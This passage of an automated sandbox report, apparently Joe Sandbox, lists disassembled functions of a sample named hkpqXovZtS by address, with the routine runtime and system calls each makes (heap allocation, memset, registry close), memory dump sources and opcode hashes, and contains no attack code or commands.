Instruction Fuzzy Hash: C4511B71A08215AFCB0ADF48D99095EF3F5FFC8B08F10881DE689D7245D730A905DB96

Function 004092A1 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00409304

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: 4ef09c175604b915a0f324d95a047c37d4305c38759195144dd76dd018e855cf
Instruction ID: 851c4021d88b77b2391399c16b3f111d51d0d509961a3bf2f544ad5092f2c5c1
Opcode Fuzzy Hash: 4ef09c175604b915a0f324d95a047c37d4305c38759195144dd76dd018e855cf
Instruction Fuzzy Hash: 292192716412186ADF209F65C941BDA73A8AF16704F00846BF945BB2C2D2789E84CB98

Function 0040F12A Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3

_malloc.LIBCMT ref: 0040F1AF

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateH_prologHeap_malloc
String ID:
API String ID: 3218263244-0
Opcode ID: b1605ace7e7b6f59692fdb9d2c1fcb21a67d47c71e7f1ac774e37c5e784f0e02
Instruction ID: 13ecf58393b850d4dcf62f4b090d4bd7f87923e5f9eb74dacda1a2a2b25616ff
Opcode Fuzzy Hash: b1605ace7e7b6f59692fdb9d2c1fcb21a67d47c71e7f1ac774e37c5e784f0e02
Instruction Fuzzy Hash: 81117432804288CFCB22DBA4C8515EE7BB0AF09314F1400BFC4526B2D2EA7D594ACB24

Function 0040730F Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407314

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: aa5e027e605d9c7aa5fc794eba84c6725fdbe8de1aad472a731ad67a540c2c24
Instruction ID: 5f29ca8d028dcbf4478a0dccd66fe47fd797d4706ee7f484061b46a6f8bae4d7
Opcode Fuzzy Hash: aa5e027e605d9c7aa5fc794eba84c6725fdbe8de1aad472a731ad67a540c2c24
Instruction Fuzzy Hash: F3119132D00356A7DB21AE59C885BEF7664AB84728F04423EEC24772C1C77CAD50E6DE

Function 0040F127 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1

Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3

_malloc.LIBCMT ref: 0040F1AF

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset$H_prolog$AllocateHeap_malloc
String ID:
API String ID: 4222972222-0
Opcode ID: 238b6014e27b17abf2400218ffa1caa5fe559d75f281bd02877e9b1c6b73aa66
Instruction ID: 21d0035833bb4e516a42c3fe1892bcdba2466c9154d59b7260265a3ac8994e5a
Opcode Fuzzy Hash: 238b6014e27b17abf2400218ffa1caa5fe559d75f281bd02877e9b1c6b73aa66
Instruction Fuzzy Hash: 59117C72800249DBCF11DFA5C8819EEB7B4BF18308F14047FE40A77291EB395A49CB65

Function 022ACA33 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 022A79D8: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 022A7A19

_free.LIBCMT ref: 022ACAA2

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 74ec985b845149d2fb39c7ff511b9964ee0716ab4dfd8355de6e1a843b65cb50
Instruction ID: f97b1755f762605ce1bb8b91158d08b496b7c0074613099ec16198ddd1454504
Opcode Fuzzy Hash: 74ec985b845149d2fb39c7ff511b9964ee0716ab4dfd8355de6e1a843b65cb50
Instruction Fuzzy Hash: 3C014972610317AFC320CFA8C89499DFB98FB057B0F04022AE556A7AC0E3706911CBA4

Function 0040F13F Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3

_malloc.LIBCMT ref: 0040F1AF

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateH_prologHeap_malloc
String ID:
API String ID: 3218263244-0
Opcode ID: ca89fc0f26018b19baf3706dbfef26bfe5d5f2317c3fc148892d5a9d1a6ad13d
Instruction ID: 0f7d4ec6ecad36ae556b8e39718a27ffd0918a8d9bbd7808b8bf1204012fa6c0
Opcode Fuzzy Hash: ca89fc0f26018b19baf3706dbfef26bfe5d5f2317c3fc148892d5a9d1a6ad13d
Instruction Fuzzy Hash: 20112132844249CFCB21DB90C8505EDBBB0AB19320F14057FC4667B7D1EA3D8E8ACB58

Function 00414D94 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414D99

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 204225fd370e15f0e9935236bf399b5a8d328ae08fd7cb24cfd8ed0b73c44cc6
Instruction ID: 12b6cdf0504e8e8e4d3ffe247d21c8e274d40cea25b07612d523ec07e484e320
Opcode Fuzzy Hash: 204225fd370e15f0e9935236bf399b5a8d328ae08fd7cb24cfd8ed0b73c44cc6
Instruction Fuzzy Hash: 7B113030410F419AD728FB66D9536DEBBB4EF10708F400E6EA06B725D2AF786E44CE48

Function 022A79D8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 022A7A19

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9a7359b4773ad95f87851d4818ee08819a2a666e63ec263142efeec8deed2964
Instruction ID: f45d664ef53d3c6bfe8415b3e1da204c46802ccf2626d88ca0211d06df3429a7
Opcode Fuzzy Hash: 9a7359b4773ad95f87851d4818ee08819a2a666e63ec263142efeec8deed2964
Instruction Fuzzy Hash: 24F02B3167062277AF215AF19C28B5EF749FF40760B148462AC0696888DB34D50085E8

Function 00408D5A Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408D5F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d1011b4a530236cec844ef2aaabdf93ff99397e8f3bedf57033aa1edd207842c
Instruction ID: 4676c6699d0101cc9825e3f39fc19b8158240de837ab5ab823d9f2709d8006e6
Opcode Fuzzy Hash: d1011b4a530236cec844ef2aaabdf93ff99397e8f3bedf57033aa1edd207842c
Instruction Fuzzy Hash: 79F04F35B00214AFD7149B58C85ABADB7B5EF48724F208159E952A73E1CB749D00CA44

Function 0040543A Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040543F

Part of subcall function 00409DB1: __EH_prolog.LIBCMT ref: 00409DB6

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6e02045fab941059f65ff4a154f2203e9c39ff24e10a8a0b29256c0ea5043523
Instruction ID: 40c3eb5563088174663048f5e38b888e729674675cca481110b70df2976217d2
Opcode Fuzzy Hash: 6e02045fab941059f65ff4a154f2203e9c39ff24e10a8a0b29256c0ea5043523
Instruction Fuzzy Hash: 75016D34651694DEC705E7E4C1217DDB7A49F34308F0040AEE456632C3CBF82B44CA65

Function 004071F4 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004071F9

Part of subcall function 00414D94: __EH_prolog.LIBCMT ref: 00414D99

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 341e869ecc4179afed5e20fd19188a1710d756600e918ce76fbab95388a4614a
Instruction ID: 56afb8b6ccf3b08ab66e565d94ddd098080b76072618de6acc7ed38b189a1fbe
Opcode Fuzzy Hash: 341e869ecc4179afed5e20fd19188a1710d756600e918ce76fbab95388a4614a
Instruction Fuzzy Hash: 72F08231600600DBC715EB55D4517EEB7B4AF85718F10466FE066636C1CBB86E458619

Function 0045711E Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004D103C: NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056

RegCloseKey.KERNEL32 ref: 00468471

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CloseFreeMemoryVirtual
String ID:
API String ID: 2711871119-0
Opcode ID: 9c94fc4a45cceb731be6840bb9cc4d86251a5b3b339c24b2e1e7c5a830a9a862
Instruction ID: ec7d48f9962f92385e086f278855c482788979e1b8b6d39903ed5b05c0c3391d
Opcode Fuzzy Hash: 9c94fc4a45cceb731be6840bb9cc4d86251a5b3b339c24b2e1e7c5a830a9a862
Instruction Fuzzy Hash: 9DE06D3050410AEFCB11EFA5D581B6EB3E4AFC5708F80894FF24887217EB38A8019B5B

Function 00409663 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00409684

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: ee9828c554a4db0b44df66e38e15d315cdf1d24970fda13dfa077ecae02ec3b5
Instruction ID: 6b6e9163a40b9cdbbcca5be6a97a8d46a1995cf2690d9d845e8dc861eb38798a
Opcode Fuzzy Hash: ee9828c554a4db0b44df66e38e15d315cdf1d24970fda13dfa077ecae02ec3b5
Instruction Fuzzy Hash: D8E0CD7190475025D321511D9C04F57A6D85B91715F15C83FF058A32C2C1BC5C41C75D

Function 0046844E Relevance: 1.5, APIs: 1, Instructions: 17registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004D103C: NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056

RegCloseKey.KERNEL32 ref: 00468471

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CloseFreeMemoryVirtual
String ID:
API String ID: 2711871119-0
Opcode ID: 4c494bc388c5ee9f03f29afb729e533da9459f73fe8753aadb097e9c5fa049bb
Instruction ID: 955c776a1d1e3a65268bdb694e4aec38169b7818c366181a3fd7b7c7f4cd751c
Opcode Fuzzy Hash: 4c494bc388c5ee9f03f29afb729e533da9459f73fe8753aadb097e9c5fa049bb
Instruction Fuzzy Hash: 79D0A70804148B794A123AF3B9E2ABD7785594331A7C4058FB600417376E0E1241056D

Function 004206C6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 004206D2

Part of subcall function 0042059A: __initterm.LIBCMT ref: 00420670
Part of subcall function 0042059A: __initterm.LIBCMT ref: 00420680

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __initterm$_doexit
String ID:
API String ID: 1457160226-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: ef2b215410fff71cddba942c18862738273fc0e873b6bf9cc3faac2dfeed7b07
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: BEB0923268021C33DA202542AC03F063B4A87C0B64E640021BA0C1D1A2A9A2A9A184DD

Function 00405FB8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00405FC6

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: Item
String ID:
API String ID: 3207170592-0
Opcode ID: 717afb6377721a8c3561f49ce9aa86fb33470c8ff035dd4e4f75ec1d2af72992
Instruction ID: 65e1ad9f224df52f49bfcdc5615452e7ee0584e9f18ae1ad460875678e4fc733
Opcode Fuzzy Hash: 717afb6377721a8c3561f49ce9aa86fb33470c8ff035dd4e4f75ec1d2af72992
Instruction Fuzzy Hash: D1C04C76009250BED7023BA19C14C6FBBE99B95211F55C95AB5A880031C63984509B25

Function 00408EA2 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,000000FF,?), ref: 00408F01

Part of subcall function 00408D5A: __EH_prolog.LIBCMT ref: 00408D5F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorH_prologLast
String ID:
API String ID: 1057991267-0
Opcode ID: a183c24a2afad8874b0985ace0ecac72c18a9018df0b657ede04aae4a11c956f
Instruction ID: c93f1575e837a4b808ade84526d54479894f8a2543c249c9c4a9aa10862eb84d
Opcode Fuzzy Hash: a183c24a2afad8874b0985ace0ecac72c18a9018df0b657ede04aae4a11c956f
Instruction Fuzzy Hash: 52019231000305DBDB249F24CE04AAB77A6FF51364F14463FF9A0A62D0DF78D951DA98

Non-executed Functions

Function 0040DB4C Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 305COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0040DB64
%s %s, xrefs: 0040DD6A, 0040DE6E
%s %s %s, xrefs: 0040DCF1, 0040DE0F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 0-1840816070
Opcode ID: d0c258ee0a76b36f1ee0b52904a1d61c9cb4faef01de8f0c13ef48c4b50bacf1
Instruction ID: a7f8116432e4b51e2bae2a804a5e65433a85644bdaa3587098c906cc1ded094b
Opcode Fuzzy Hash: d0c258ee0a76b36f1ee0b52904a1d61c9cb4faef01de8f0c13ef48c4b50bacf1
Instruction Fuzzy Hash: 3091757294121CBAEB21EBE0CC82FEF776DEB04704F500467BA05E61D1D679AE458B68

Function 0041037B Relevance: 24.2, APIs: 16, Instructions: 225COMMON

Download Yara Rule

APIs

